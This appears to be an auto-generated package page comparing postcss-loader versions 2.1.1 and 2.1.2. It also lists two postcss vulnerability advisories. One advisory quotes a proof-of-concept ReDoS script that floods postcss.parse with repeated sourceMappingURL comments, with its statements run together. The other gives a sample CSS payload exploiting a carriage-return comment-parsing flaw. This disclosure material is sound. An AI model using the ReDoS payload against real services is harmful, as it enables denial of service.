PostCSS Loader is a crucial webpack tool enabling developers to seamlessly integrate PostCSS, a powerful CSS transformation tool, into their web development workflows. Version 2.1.2 represents a minor update to the previous stable version, 2.1.1, focusing primarily on internal improvements and bug fixes. Both versions share the same core dependencies, including loader-utils, postcss, postcss-load-config, and schema-utils, ensuring consistent compatibility with key ecosystem tools. The development dependencies also remain identical, reflecting a stable development environment and consistent testing practices using tools like Jest, Standard, and Webpack.
The key difference lies in the dist section, showcasing a slight increase in unpacked size from 28856 bytes in version 2.1.1 to 29244 bytes in version 2.1.2. While seemingly minor, this increase suggests that the newer version may contain additional features, optimizations, or refined code, even if not explicitly documented in the metadata. The release date also significantly differs with the latest postcss-loader being released on March 17, 2018, well after the February 26, 2018 release date of the 2.1.1 version. For developers, upgrading to version 2.1.2 is recommended as it likely includes bug fixes and performance enhancements, improving overall stability and potential optimizations, solidifying PostCSS Loader as a reliable and efficient solution for modern CSS processing within webpack-based projects.
All the vulnerabilities related to the version 2.1.2 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.